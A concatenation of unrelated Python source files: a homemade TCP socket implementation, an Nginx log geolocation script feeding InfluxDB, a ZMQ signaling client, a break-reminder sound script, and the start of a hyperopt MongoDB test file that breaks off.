self.__local_address = local_address
self.__is_time_out = False # init is_timeout
self.__send_buffer = b''
self.__time_out = 0 # todo init timeout
self.__timer = threading.Thread()
self.__timer_pid = 0 # helper variable for timer
self.__duplicate_ack = 0 # init duplicate ack number
local_ip = local_address[0]
if server_isn: # if the socket is build by server
# pass sequence number and last_acked_number
self.__next_sequence_number = server_isn
self.__last_ack_received = server_isn # SendBase
self.__last_acked_sent = client_isn
# init remote address and set up ip layer
self.__remote_address = remote_address
self.__ip = IP.IP(IP.PROTOCOL_TCP, self.__local_address[0], self.__remote_address[0])
# start sending process
self.__sending_process = threading.Thread(target=self._sending_thread)
self.__sending_process.start()
self.__time_out = self._get_new_timeout()
else:
self.__next_sequence_number = random.randint(0, 2147483645)
def listen(self, backlog=None):
"""
listen([backlog])
Enable a server to accept connections. If backlog is specified, it must be
at least 0 (if it is lower, it is set to 0); it specifies the number of
unaccepted connections that the system will allow before refusing new
connections. If not specified, a default reasonable value is chosen.
"""
if not self.__local_address:
raise AddressNotSpecified("Did you bind address for this socket?")
if self.__local_address[1] in buffer_list.keys():
raise PortAlreadyInUse("Port is already in use.")
# print('start listening')
# open buffer for listening
buffer_list['listening'][self.__local_address[1]] = {'queue': []}
# print('create buffer_list')
# print(buffer_list)
# set up ip layer
self.__ip = IP.IP(IP.PROTOCOL_TCP, self.__local_address[0])
def accept(self):
"""accept() -> address tuple, server_isn int
Wait for an incoming connection. Return a new socket
representing the connection, and the address of the client.
For IP sockets, the address info is a pair (hostaddr, port).
"""
# fd, addr = self._accept()
# If our type has the SOCK_NONBLOCK flag, we shouldn't pass it onto the
# new socket. We do not currently allow passing SOCK_NONBLOCK to
# accept4, so the returned socket is always blocking.
# type = self.type & ~globals().get("SOCK_NONBLOCK", 0)
# sock = socket(self.family, type, self.proto, fileno=fd)
# Issue #7995: if no default timeout is set and the listening
# socket had a (non-zero) timeout, force the new socket in blocking
# mode to override platform-specific socket flags inheritance.
# if getdefaulttimeout() is None and self.gettimeout():
# sock.setblocking(True)
# return address, server_isn
# if not self.__address:
# raise AddressNotSpecified("Did you bind address for this socket?")
# wait until one connected
while buffer_list['listening'][self.__local_address[1]]['queue'] == []:
continue
# retrive first handshake
data, (remote_ip, remote_port) = buffer_list['listening'][self.__local_address[1]]['queue'].pop()
tcp = TCP()
tcp.from_bytes(data)
if not (tcp.SYN == 1 and tcp.ACK == 0):
# print("wrong tcp package received, it's not the first handshake")
return
client_isn = tcp.sequence_number
print('first handshake received')
# reformat remote_address
address = (remote_ip, tcp.src_port)
# generate a inital server_isn
server_isn = random.randint(0, 2147483645)
# build a tcp with server_isn and client_isn + 1
tcp = TCP()
tcp.build(type=tcp.SEND_SYNACK,
src_port=self.__local_address[1],
dst_port=address[1],
sequence_number=server_isn,
acknowledgement_number=client_isn + 1)
# send the second handshake and register a place for handshake
tmp_ip = IP.IP(IP.PROTOCOL_TCP, self.__local_address[0], remote_ip)
tmp_ip.send(bytes(tcp))
buffer_list['connecting'][address] = []
print('second handshake sent, waiting for the third handshake')
# record the first time of send package
fisrt_pacakge_sent_time = time.time()
# wait until third handshake appear
send_send_start_time = time.time()
flag_3 = True
flag_6 = False
flag_12 = False
while buffer_list['connecting'][address] == []:
if flag_3 and (time.time() - send_send_start_time >= 2):
print('waiting second hand time out, wait another 6s')
tmp_ip.send(bytes(tcp))
send_send_start_time = time.time()
flag_3 = False
flag_6 = True
send_send_start_time =time.time()
elif flag_6 and (time.time() - send_send_start_time >= 2):
print('waiting second hand time out, wait another 12s')
tmp_ip.send(bytes(tcp))
send_send_start_time = time.time()
flag_6 = False
flag_12 = True
send_send_start_time =time.time()
elif flag_12 and (time.time() - send_send_start_time >= 2):
print('waiting second hand time out, wait another 24s')
tmp_ip.send(bytes(tcp))
flag_6 = False
flag_12 = False
send_send_start_time =time.time()
elif (time.time() - send_send_start_time >= 4):
print('waiting second hand time out, wait another 6s')
print('break')
return
continue
# record the time of receiving second package
self.__sample_RTT = time.time() - fisrt_pacakge_sent_time
self.__estimated_RTT = self.__sample_RTT
print('first sample RTT generated, it\'s {}'.format(self.__sample_RTT))
# retrive the third handshake
data, address = buffer_list['connecting'][address].pop()
tcp = TCP()
tcp.from_bytes(data)
print('third handshake retrived')
# check third handshake
if not (tcp.sequence_number == client_isn + 1 and tcp.acknowledgement_number == server_isn + 1):
print(
'SYN {}, ACK{}, tcp.sequencenumber({}) ?= client_isn({}), tcp.acknowledgement_number({}) ?= server_isn({})'.format(
tcp.SYN, tcp.ACK, tcp.sequence_number, client_isn + 1, tcp.acknowledgement_number, server_isn + 1))
print("wrong tcp package received, it's not the correct third handshake")
return
# update server_isn
server_isn += 1
# open a place for the newly connected socket
buffer_list['connected'][address] = []
# delete the original space
buffer_list['connecting'].pop(address)
# add data to the buffer if any
# buffer_list['connected'][address].append(tcp.data)
# Build a new tcpSocket
tcpSocket = TCPsocket(self.__local_address, address, server_isn, client_isn + 1, self.__sample_RTT)
# put the conneceted object in buffer
buffer_list['connected']['objects'][address] = tcpSocket
# add data if any
if tcp.data != b'':
tcpSocket._add_data(tcp.data)
print('done with accept, returned address and server_isn')
return address, tcpSocket
def recv(self, buffersize, flags=None): # real signature unknown; restored from __doc__
"""
recv(buffersize[, flags]) -> data
Receive up to buffersize bytes from the socket. For the optional flags
argument, see the Unix manual. When no data is available, block until
at least one byte is available or until the remote end is closed. When
the remote end is closed and all data is read, return the empty string.
"""
while not self.__received_buffer:
continue
return_data = self.__received_buffer[:buffersize]
self.__received_buffer = self.__received_buffer[buffersize:]
return return_data
def send(self, data, flags=None): # real signature unknown; restored from __doc__
"""
send(data[, flags]) -> count
Send a data string to the socket. For the optional flags
argument, see the Unix manual. Return the number of bytes
sent; this may be less than len(data) if the network is busy.
"""
# if self.__type != SOCK_STREAM:
# raise TypeNotRightException("type is not correct, is the socket assigned TCP protocol?")
# NextSeqNum: int = 0
self.__send_buffer += data
def _sending_thread(self):
# build empty tcp object
tcp = TCP()
tcp.build(type=tcp.SEND_DATA, src_port=self.__local_address[1], dst_port=self.__remote_address[1])
tcp.sequence_number = self.__next_sequence_number
tcp.acknowledgement_number = self.__last_acked_sent
print('built empty tcp object')
while 1:
time.sleep(0.2)
# print('sending thread begin')
# detect whether there is act_to_be_sent
if self.__ack_to_be_sent != []:
tcp.ACK = 1
tcp.acknowledgement_number = self.__ack_to_be_sent.pop()
self.__last_acked_sent = tcp.acknowledgement_number
print(
'detect there is ack_to_be_sent({}), added to current tcp object, last_acked_number updated'.format(
tcp.acknowledgement_number))
# check time_out
if self.__is_time_out:
print('detect time out')
# get first send_but_not_acked data in tcp.data
try:
tcp_bytes = self.__sent_but_not_acked[0]
tcp = TCP()
tcp.from_bytes(tcp_bytes)
# modify tcp.sequence_number
# tcp.sequence_number = waiting_ack_number - len(tcp.data)
# double timeout
self.__time_out *= 2
if self.__time_out <= 1:
self.__time_out = 1
# cancel SampleRTT recording for this object
self.__sample_RTT_to_record[tcp.sequence_number + len(tcp.data)] = None
# Done with here
self.__is_time_out = False
self.__timer = threading.Thread()
self.__timer_pid = None
print(self.__time_out)
except:
self.__is_time_out = False
self.__timer = threading.Thread()
self.__timer_pid = None
else:
# print('no timeout detected')
# calculate the spare room in sent_but_not_acked
spare_room_in_window = self.__window_size - (self.__next_sequence_number - self.__last_ack_received)
if self.__send_buffer != b'' and spare_room_in_window != 0: # specify squence number andNextSeqNum
NextSeqNum = self.__next_sequence_number
# prepare data
data = self.__send_buffer[:self.__segment_size]
# delete that data from send_buffer
self.__send_buffer = self.__send_buffer[self.__segment_size:]
# update tcp object
tcp.data = data
tcp.sequence_number = NextSeqNum
# check tcp modified
if tcp.data != b'' or tcp.ACK == 1:
# set sequence number
# tcp.sequence_number = self.__next_sequence_number
# if data included, update next_sequence_number
if tcp.data != b'':
self.__next_sequence_number += len(data)
# if the tcp contains data
if tcp.data != b'':
# check the data is first sent or not
# add current value to sent_but_not_acked
if bytes(tcp) not in self.__sent_but_not_acked:
self.__sent_but_not_acked.append(bytes(tcp))
if (tcp.sequence_number + len(tcp.data)) not in self.__sample_RTT_to_record.keys():
# it's first sent.
# record send time
send_time = time.time()
self.__sample_RTT_to_record[tcp.sequence_number + len(tcp.data)] = send_time
# print('----------')
# print('record time')
# print(self.__sample_RTT_to_record)
# print('----------')
# check whether there is already a tiemr
print('check timer', self.__timer.is_alive())
if not self.__timer.is_alive():
# there is no timer
# calculate a new time_out
self.__time_out = self._get_new_timeout()
# start a new timer
self.__timer = threading.Thread(target=self.__check_time,
args=(time.time(),
self.__time_out))
self.__timer.start()
else:
# it's not first sent
# double timeout
print('detect not first send message, the sequence_number is {}, the ack_number is {}, content:{}'.format(tcp.sequence_number, tcp.acknowledgement_number, str(tcp)))
print(self.__sample_RTT_to_record)
self.__time_out *= 2
self.__timer = threading.Thread(target=self.__check_time,
args=(time.time(),
self.__time_out))
self.__timer.start()
# send tcp object
self.__ip.send(bytes(tcp))
print(
'send tcp object with \tsequence number {} and \tacknowledge number {}.'.format(tcp.sequence_number,
tcp.acknowledgement_number))
print('content', str(tcp))
# build new tcp object
tcp = TCP()
tcp.build(type=tcp.SEND_DATA, src_port=self.__local_address[1], dst_port=self.__remote_address[1])
tcp.sequence_number = self.__next_sequence_number
tcp.acknowledgement_number = self.__last_acked_sent
# print('built empty tcp object')
def _add_data(self, data):
tcp = TCP()
tcp.from_bytes(data)
# print('retrived data from IP layer')
# if has ack info
if tcp.ACK == 1:
# print("detect ACK info, it's", tcp.acknowledgement_number)
if tcp.acknowledgement_number == self.__last_ack_received:
# it's duplicated ack
self.__duplicate_ack += 1
print('detect {} duplicated ACK'.format(self.__duplicate_ack))
if self.__duplicate_ack >= 3:
# fast retransmission
# stop timer and make timeout to be true
self.__timer = threading.Thread()
self.__timer_pid = None
self.__is_time_out = True
print('timer stoped, set timeout to be true, preparing for retransmission')
self.__duplicate_ack = 0
else:
self.__duplicate_ack = 0
# it's not duplicated ack
if tcp.acknowledgement_number > self.__last_ack_received:
print('current SendBase {}, updated to {}'.format(self.__last_ack_received,
tcp.acknowledgement_number))
# update SendBase
self.__last_ack_received = tcp.acknowledgement_number
self.__next_sequence_number = tcp.acknowledgement_number
# calculating a new SampleRTT
# print('----------')
# print('receive time')
# print(self.__sample_RTT_to_record)
# print('tcp info:')
# print('sequence_number:{}, acknowledgement_number:{}, content:{}'.format(tcp.sequence_number, tcp.acknowledgement_number, str(tcp)))
# print('----------')
try:
self.__sample_RTT = time.time() - self.__sample_RTT_to_record[tcp.acknowledgement_number]
except:
pass
# remove self.__send_but_not_acked objects according to the ack number
print('updating sent_but_not_acked list')
remove_list = []
for tcp_bytes in self.__sent_but_not_acked:
tcp_ = TCP()
tcp_.from_bytes(tcp_bytes)
if tcp_.sequence_number + len(tcp_.data)<= tcp.acknowledgement_number:
remove_list.append(tcp_bytes)
print('removed waiting_ack_number:{}'.format(tcp_.sequence_number + len(tcp_.data)))
for item in remove_list:
self.__sent_but_not_acked.remove(item)
# print('updated')
# check whether a timer is running
if self.__timer.is_alive():
print('detect a timer still running')
# check whether there are still sent_but_not_acked
if self.__sent_but_not_acked:
print('detect there is still sent_but_not_acked:')
print(self.__sent_but_not_acked)
print('restart timer')
self.__time_out = self._get_new_timeout()
# restart timer
self.__timer = threading.Thread(target=self.__check_time,
args=(time.time(), self.__time_out))
self.__timer.start()
else:
# stop timer
self.__timer = threading.Thread()
self.__timer_pid = None
self.__is_time_out = False
self.__time_out = self._get_new_timeout()
print('no data in sent_but_note_acked, stopped timer')
# if has data info:
if tcp.data != b'':
# check whether it's duplicate data
if tcp.sequence_number < self.__last_acked_sent:
print('the sequence_number({}) < last_acked_sent({}), omit it.'.format(tcp.sequence_number,
self.__last_acked_sent))
# it's duplicate data
tcp = TCP()
tcp.build(type = tcp.SEND_ACK, src_port=self.__local_address[1], dst_port=self.__remote_address[1], acknowledgement_number=self.__last_acked_sent)
print('duplicate data, send ack')
else:
# it's not duplicate data
# put it in self.__window_buffer and sort
print(tcp.data, 'has added to window buffer')
self.__window_buffer.append((tcp.sequence_number, tcp.data))
self.__window_buffer.sort(key=lambda x: x[0])
# check tmp_buffer in-order data, if any, put it to recv_buffer
while self.__window_buffer[0][0] == self.__last_acked_sent:
# retrive from window_buffer(tmp_buffer)
sequence_number, data = self.__window_buffer.pop()
# calculate and update last_ack_sent
self.__last_acked_sent += len(data)
# put data into recv_buffer
self.__received_buffer += data
print(
'put data with sequence_number {} out of tmp_buffer into recv_buffer, updated last_ack_sent, waiting to be sent later'.format(tcp.sequence_number))
if len(self.__window_buffer) == 0:
break
# put last_ack_sent to ack_to_be_sent
self.__ack_to_be_sent.append(self.__last_acked_sent)
print('not duplicate, send ack', self.__last_acked_sent)
def connect(self, remote_address): # real signature unknown; restored from __doc__
"""
connect(address)
Connect the socket to a remote address. For IP sockets, the address
is a pair (host, port).
"""
# init remote_address
self.__remote_address = remote_address
# connect to IP layer
print('connecting to IP layer')
self.__ip = IP.IP(IP.PROTOCOL_TCP, self.__local_address[0], dst_ip=remote_address[0])
print('connected to IP layer')
# generate client_isn
self.__isn = random.randint(0, 2147483645)
client_isn = self.__isn
print('generated isn', self.__isn)
# build a tcp object with SYN
tcp = TCP()
tcp.build(type=tcp.SEND_SYN,
src_port=self.__local_address[1],
dst_port=remote_address[1],
sequence_number=self.__isn)
# sign a space in buffer_list
buffer_list['connecting'][remote_address] = []
# sent tcp object
self.__ip.send(bytes(tcp))
print('sent tcp object')
# record first_package_sent_time
first_package_sent_time = time.time()
# wait for sencond hanshake
print('waiting for sencond hanshake')
star_time = time.time()
flag_3 = True
flag_6 = False
flag_12 = False
while buffer_list['connecting'][remote_address] == []:
if flag_3 and time.time() - star_time >= 2:
print('3s timeout')
self.__ip.send(bytes(tcp))
flag_3 = False
flag_6 = True
star_time = time.time()
elif flag_6 and time.time() - star_time >= 2:
print('6s timeout')
self.__ip.send(bytes(tcp))
flag_6 = False
flag_12 = True
star_time = time.time()
elif flag_12 and time.time() - star_time >= 2:
print('12s timeout')
self.__ip.send(bytes(tcp))
flag_12 = False
star_time = time.time()
elif time.time() - star_time >= 4:
print('break')
return
continue
self.status = 'established'
# record first_package_receive_time
self.__sample_RTT = time.time() - first_package_sent_time
self.__estimated_RTT = self.__sample_RTT
self._get_new_timeout()
print('fisrt sampleRTT inited, it\'s', self.__sample_RTT)
# retrive data
data = buffer_list['connecting'][remote_address].pop()
print('retrived')
# parse tcp object
tcp = TCP()
tcp.from_bytes(data)
# check tcp object is right
if not (tcp.SYN == 1 and tcp.ACK == 1 and tcp.acknowledgement_number == client_isn + 1):
print('the tcp object is not right. Connect failed')
return
# if it's right, update server_isn, client_isn
server_isn = tcp.sequence_number
client_isn += 1
self.__next_sequence_number = client_isn
print('client_isn sent', client_isn)
self.__last_ack_received = tcp.acknowledgement_number
# remove from buffer_list['connecting'], added to buffer_list['connected']
buffer_list['connecting'].pop(remote_address)
buffer_list['connected']['objects'][remote_address] = self
# generate last_ack_sent and update ack_to_be_sent list, last_ack_received
self.__last_acked_sent = server_isn + 1
self.__ack_to_be_sent.append(self.__last_acked_sent)
# start sending thread
self.__sending_process = threading.Thread(target=self._sending_thread)
self.__sending_process.start()
print('connected')
@staticmethod
def push(data, remote_ip):
# print
# print('[static method]received data from ip, it\'s from', remote_ip)
tcp = TCP()
tcp.from_bytes(data)
# print('current buffer_list is')
# print(buffer_list)
# print('src_port is', tcp.src_port, end=' ')
# print('dst_port is', tcp.dst_port, end=' ')
# print('content is', str(tcp))
# print()
# print basic info
# names = ['CWR','ECE','URG','ACK','PSH','RST','SYN','FIN']
# byte = tcp.flag_bits
# byte = bin(int.from_bytes(byte, 'little'))[2:]
# print(bytes)
# for i in range(8):
# print("{}:{}".format(names[i], byte[i]))
#
# if tcp.SYN == 1 and tcp.ACK != 1:
# b
remote_address = (remote_ip, tcp.src_port)
if tcp.RST:
raise ConnectionResetError
try:
if tcp.SYN == 1 and tcp.ACK == 1:
print('detect second handshake')
try:
buffer_list['connecting'][remote_address].append(data)
except:
server_isn = tcp.sequence_number
client_isn = tcp.acknowledgement_number
remote_port = tcp.src_port
local_port = tcp.dst_port
tcp = TCP()
tcp.sequence_number = client_isn
tcp.acknowledgement_number = server_isn
tcp.src_port = local_port
tcp.dst_port = remote_port
tmp_ip = IP.IP(protocol=IP.PROTOCOL_TCP, src_ip=local_ip, dst_ip=remote_ip)
print('retransmitted', tcp.sequence_number, tcp.acknowledge_number)
print("str", str(tcp))
tmp_ip.send(bytes(tcp))
elif tcp.SYN == 1:
# it's first handshake
print('detect first handshake')
buffer_list['listening'][tcp.dst_port]['queue'].append((data, remote_address))
else:
# it's not first handshake
# self.__last_acked_number = tcp.acknowledgement_number # todo update last_acked_number
# check whether it's a third handshake
if remote_address in buffer_list['connected']['objects'].keys():
print('detect normal message')
# it's not a third handshake
# buffer_list['connected'][remote_address].append((data, remote_address))
# get tcp object
obj = buffer_list['connected']['objects'][remote_address]
# let obj add data
obj._add_data(data)
else:
# it's a third handshake
print('detect third handshake')
buffer_list['connecting'][remote_address].append((data, remote_address))
except:
local_port = tcp.dst_port
remote_port = tcp.src_port
sequence_number = tcp.acknowledgement_number
acknowledge_number = tcp.sequence_number
tcp = TCP()
tcp.RST = 1
tcp.ACK = 0
tcp.src_port = local_port
tcp.dst_port = remote_port
tcp.sequence_number = sequence_number
tcp.acknowledgement_number = acknowledge_number
tmp_ip = IP.IP(protocol=IP.PROTOCOL_TCP, src_ip= local_ip, dst_ip=remote_ip)
tmp_ip.send(bytes(tcp))
# print()
def _get_new_timeout(self): # todo calculate a new time out
if not self.__estimated_RTT:
self.__estimated_RTT = self.__sample_RTT
if not self.__dev_RTT:
self.__dev_RTT = 0
self.__estimated_RTT = 0.85 * self.__estimated_RTT + 0.125 * self.__sample_RTT
self.__dev_RTT = 0.75 * self.__dev_RTT + 0.25 * abs(self.__sample_RTT - self.__estimated_RTT)
self.__time_out = self.__estimated_RTT + self.__dev_RTT
if self.__time_out == 0:
self.__time_out = 1
return self.__time_out
def __check_time(self, start_time, time_interval):
print('timer start')
self.__timer_pid = os.getpid()
pid = os.getpid()
while 1:
# print('ticking', time.time(), start_time, time_interval)
time.sleep(time_interval * 0.1)
if self.__timer_pid != pid:
return
current_time = time.time()
if current_time - start_time > time_interval:
self.__is_time_out = True
self.timer_thread = threading.Thread()
return
def close(self):
try:
buffer_list['listening'].pop(self.__local_address[1])
except:
pass
try:
buffer_list['connecting'].pop(self.__remote_address)
except:
pass
try:
buffer_list['connected']['objects'][self.__remote_address]
except:
pass
def __del__(self):
pass
|
geoparser.py
|
# Getting GEO information from Nginx access.log by IP's.
# Alexey Nizhegolenko 2018
# Parts added by Remko Lodder, 2019.
# Added: IPv6 matching, make query based on geoip2 instead of
# geoip, which is going away r.s.n.
import os
import re
import sys
import time
import geohash
import logging
import logging.handlers
import geoip2.database
import configparser
import threading
from influxdb import InfluxDBClient
from IPy import IP as ipadd
import glob
class SyslogBOMFormatter(logging.Formatter):
def format(self, record):
result = super().format(record)
return "ufeff" + result
handler = logging.handlers.SysLogHandler('/dev/log')
formatter = SyslogBOMFormatter(logging.BASIC_FORMAT)
handler.setFormatter(formatter)
root = logging.getLogger(__name__)
root.setLevel(os.environ.get("LOGLEVEL", "INFO"))
root.addHandler(handler)
# Preparing for reading config file
PWD = os.path.abspath(os.path.dirname(os.path.realpath(__file__)))
CONFIG = configparser.ConfigParser()
CONFIG.read('%s/settings.ini' % PWD)
# Getting params from config
LOGPATH = CONFIG.get('NGINX_LOG', 'logpath')
INFLUXHOST = CONFIG.get('INFLUXDB', 'host')
INFLUXPORT = CONFIG.get('INFLUXDB', 'port')
INFLUXDBDB = CONFIG.get('INFLUXDB', 'database')
INFLUXUSER = CONFIG.get('INFLUXDB', 'username')
MEASUREMENT = CONFIG.get('INFLUXDB', 'measurement')
INFLUXUSERPASS = CONFIG.get('INFLUXDB', 'password')
GEOIPDB = CONFIG.get('GEOIP', 'geoipdb')
GI = geoip2.database.Reader(GEOIPDB)
def logparse(LOGPATH, INFLUXHOST, INFLUXPORT, INFLUXDBDB, INFLUXUSER, INFLUXUSERPASS, MEASUREMENT, INODE): # NOQA
# Preparing variables and params
try:
IPS = {}
COUNT = {}
GEOHASH = {}
HOSTNAME = os.uname()[1]
CLIENT = InfluxDBClient(host=INFLUXHOST, port=INFLUXPORT,
username=INFLUXUSER, password=INFLUXUSERPASS, database=INFLUXDBDB) # NOQA
re_IPV4 = re.compile('(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})')
re_IPV6 = re.compile('(([0-9a-fA-F]{1,4}:){7,7}[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,7}:|([0-9a-fA-F]{1,4}:){1,6}:[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,5}(:[0-9a-fA-F]{1,4}){1,2}|([0-9a-fA-F]{1,4}:){1,4}(:[0-9a-fA-F]{1,4}){1,3}|([0-9a-fA-F]{1,4}:){1,3}(:[0-9a-fA-F]{1,4}){1,4}|([0-9a-fA-F]{1,4}:){1,2}(:[0-9a-fA-F]{1,4}){1,5}|[0-9a-fA-F]{1,4}:((:[0-9a-fA-F]{1,4}){1,6})|:((:[0-9a-fA-F]{1,4}){1,7}|:)|fe80:(:[0-9a-fA-F]{0,4}){0,4}%[0-9a-zA-Z]{1,}|::(ffff(:0{1,4}){0,1}:){0,1}((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])|([0-9a-fA-F]{1,4}:){1,4}:((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]))') # NOQA
# Main loop to parse access.log file in tailf style with sending metrcs
with open(LOGPATH, "r") as FILE:
STR_RESULTS = os.stat(LOGPATH)
ST_SIZE = STR_RESULTS[6]
FILE.seek(ST_SIZE)
while True:
METRICS = []
WHERE = FILE.tell()
LINE = FILE.readline()
print(LOGPATH)
print(LINE)
INODENEW = os.stat(LOGPATH).st_ino
if INODE != INODENEW:
break
if not LINE:
time.sleep(1)
FILE.seek(WHERE)
else:
if re_IPV4.match(LINE):
m = re_IPV4.findall(LINE)
IP = m[1]
elif re_IPV6.match(LINE):
m = re_IPV6.findall(LINE)
IP = m[1]
if ipadd(IP).iptype() == 'PUBLIC' and IP:
INFO = GI.city(IP)
if INFO is not None:
print(INFO)
HASH = geohash.encode(INFO.location.latitude, INFO.location.longitude) # NOQA
COUNT['count'] = 1
GEOHASH['geohash'] = HASH
GEOHASH['host'] = HOSTNAME
GEOHASH['country_code'] = INFO.country.iso_code
GEOHASH['country_name'] = INFO.country.name
GEOHASH['city_name'] = INFO.city.name
IPS['tags'] = GEOHASH
IPS['fields'] = COUNT
IPS['measurement'] = MEASUREMENT
METRICS.append(IPS)
# Sending json data to InfluxDB
try:
CLIENT.write_points(METRICS)
except Exception:
logging.exception("Cannot establish connection with InfluxDB server: ") # NOQA
except Exeption:
logparse(LOGPATH, INFLUXHOST, INFLUXPORT, INFLUXDBDB, INFLUXUSER, INFLUXUSERPASS, MEASUREMENT, INODE)
def main():
# Parsing log file and sending metrics to Influxdb
threads = list()
# while True:
files = glob.glob(LOGPATH)
for fileName in files:
print("Parsing...", fileName)
# Get inode from log file
INODE = os.stat(fileName).st_ino
# Run main loop and grep a log file
if os.path.exists(fileName):
t = threading.Thread(target=logparse, args=(fileName, INFLUXHOST, INFLUXPORT, INFLUXDBDB, INFLUXUSER, INFLUXUSERPASS, MEASUREMENT, INODE,))
# logparse(fileName, INFLUXHOST, INFLUXPORT, INFLUXDBDB, INFLUXUSER, INFLUXUSERPASS, MEASUREMENT, GEOIPDB, INODE) # NOQA
threads.append(t)
try:
t.start()
except Exeption:
logging.exception("Cannot establish connection with InfluxDB server: ") # NOQA
else:
logging.info('Nginx log file %s not found', LOGPATH)
print('Nginx log file %s not found' % LOGPATH)
print("Waiting for threads to finish")
for thread in threads:
thread.join()
print("Closing")
if __name__ == '__main__':
try:
main()
except Exception:
logging.exception("Exception in main(): ")
except KeyboardInterrupt:
logging.exception("Exception KeyboardInterrupt: ")
sys.exit(0)
|
signaler.py
|
#!/usr/bin/env python
# encoding: utf-8
import Queue
import threading
import time
import zmq
from api import SIGNALS
from certificates import get_frontend_certificates
from utils import get_log_handler
logger = get_log_handler(__name__)
class Signaler(object):
"""
Signaler client.
Receives signals from the backend and sends to the signaling server.
"""
PORT = "5667"
SERVER = "tcp://localhost:%s" % PORT
POLL_TIMEOUT = 4000 # ms
POLL_TRIES = 3
def __init__(self):
"""
Initialize the ZMQ socket to talk to the signaling server.
"""
context = zmq.Context()
logger.debug("Connecting to signaling server...")
socket = context.socket(zmq.REQ)
# public, secret = zmq.curve_keypair()
client_keys = zmq.curve_keypair()
socket.curve_publickey = client_keys[0]
socket.curve_secretkey = client_keys[1]
# The client must know the server's public key to make a CURVE
# connection.
public, _ = get_frontend_certificates()
socket.curve_serverkey = public
socket.setsockopt(zmq.RCVTIMEO, 1000)
socket.setsockopt(zmq.LINGER, 0) # Terminate early
socket.connect(self.SERVER)
self._socket = socket
self._signal_queue = Queue.Queue()
self._do_work = threading.Event() # used to stop the worker thread.
self._worker_signaler = threading.Thread(target=self._worker)
def __getattribute__(self, name):
"""
This allows the user to do:
S = Signaler()
S.SOME_SIGNAL
Just by having defined 'some_signal' in _SIGNALS
:param name: the attribute name that is requested.
:type name: str
"""
if name in SIGNALS:
return name
else:
return object.__getattribute__(self, name)
def signal(self, signal, data=None):
"""
Sends a signal to the signaling server.
:param signal: the signal to send.
:type signal: str
"""
if signal not in SIGNALS:
raise Exception("Unknown signal: '{0}'".format(signal))
request = {
'signal': signal,
'data': data,
}
try:
request_json = zmq.utils.jsonapi.dumps(request)
except Exception as e:
msg = ("Error serializing request into JSON.\n"
"Exception: {0} Data: {1}")
msg = msg.format(e, request)
logger.critical(msg)
raise
# queue the call in order to handle the request in a thread safe way.
self._signal_queue.put(request_json)
def _worker(self):
"""
Worker loop that processes the Queue of pending requests to do.
"""
while self._do_work.is_set():
try:
request = self._signal_queue.get(block=False)
self._send_request(request)
except Queue.Empty:
pass
time.sleep(0.01)
logger.debug("Signaler thread stopped.")
def start(self):
"""
Start the Signaler worker.
"""
self._do_work.set()
self._worker_signaler.start()
def stop(self):
"""
Stop the Signaler worker.
"""
self._do_work.clear()
def _send_request(self, request):
"""
Send the given request to the server.
This is used from a thread safe loop in order to avoid sending a
request without receiving a response from a previous one.
:param request: the request to send.
:type request: str
"""
logger.debug("Signaling '{0}'".format(request))
self._socket.send(request)
poll = zmq.Poller()
poll.register(self._socket, zmq.POLLIN)
reply = None
tries = 0
while True:
socks = dict(poll.poll(self.POLL_TIMEOUT))
if socks.get(self._socket) == zmq.POLLIN:
reply = self._socket.recv()
break
tries += 1
if tries < self.POLL_TRIES:
logger.warning('Retrying receive... {0}/{1}'.format(
tries, self.POLL_TRIES))
else:
break
if reply is None:
msg = "Timeout error contacting backend."
logger.critical(msg)
else:
msg = "Received reply for '{0}' -> '{1}'".format(request, reply)
logger.debug(msg)
|
eyeguard.py
|
import schedule
import time
import threading
from playsound import playsound
import sys
minutes=20
seconds=20
if len(sys.argv)==3:
if int(sys.argv[2])>seconds:
seconds=int(sys.argv[2])
if int(sys.argv[1])>2:
minutes=int(sys.argv[1])
else:
minutes=2
elif len(sys.argv)==2:
if int(sys.argv[1])>2:
minutes=int(sys.argv[1])
else:
minutes=2
def sound_alarm():
playsound('E:/files/stdy/Useful Scripts/eye_guard/alarm.mp3')#path to your file
def sound_resume_work_alert():
playsound('E:/files/stdy/Useful Scripts/eye_guard/resume.mp3')#path to your file
def run_threaded(job_func):
job_thread = threading.Thread(target=job_func)
job_thread.start()
if __name__=="__main__":
playsound('E:/files/stdy/Useful Scripts/eye_guard/greeting.mp3') #path to your file
schedule.every(minutes).minutes.do(run_threaded,sound_alarm)
time.sleep(seconds)
schedule.every(minutes).minutes.do(run_threaded,sound_resume_work_alert)
while True:
schedule.run_pending()
time.sleep(1)
|
test_mongoexp.py
|
import six.moves.cPickle as pickle
import os
import signal
import subprocess
import sys
import traceback
import threading
import time
import unittest
import numpy as np
import nose
import nose.plugins.skip
from hyperopt.base import JOB_STATE_DONE, STATUS_OK
from hyperopt.mongoexp import parse_url
from hyperopt.mongoexp import MongoTrials
from hyperopt.mongoexp import MongoWorker
from hyperopt.mongoexp import ReserveTimeout
from hyperopt.mongoexp import as_mongo_str
from hyperopt.mongoexp import main_worker_helper
from hyperopt.mongoexp import MongoJobs
from hyperopt.fmin import fmin
from hyperopt import hp, rand
import hyperopt.tests.test_base
from .test_domains import gauss_wave2
def skiptest(f):
def wrapper(*args, **kwargs):
raise nose.plugins.skip.SkipTest()
wrapper.__name__ = f.__name__
return wrapper
class TempMongo:
"""
Context manager for tests requiring a live database.
with TempMongo() as foo:
mj = foo.mongo_jobs('test1')
"""
def __init__(self, workdir="/tmp/hyperopt_test"):
self.workdir = workdir
def __enter__(self):
try:
open(self.workdir)
assert 0
except OSError:
subprocess.call(["mkdir", "-p", "%s/db" % self.workdir])
proc_args = [
"mongod",
"--dbpath=%s/db" % self.workdir,
"--noprealloc",
"--port=22334",
]
print("starting mongod", proc_args)
self.mongo_proc = subprocess.Popen(
proc_args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd=self.workdir, # this prevented mongod assertion fail
)
try:
interval = 0.125
while interval <= 2:
if interval > 0.125:
print("Waiting for mongo to come up")
time.sleep(interval)
interval *= 2
if self.db_up():
break
if self.db_up():
return self
else:
try:
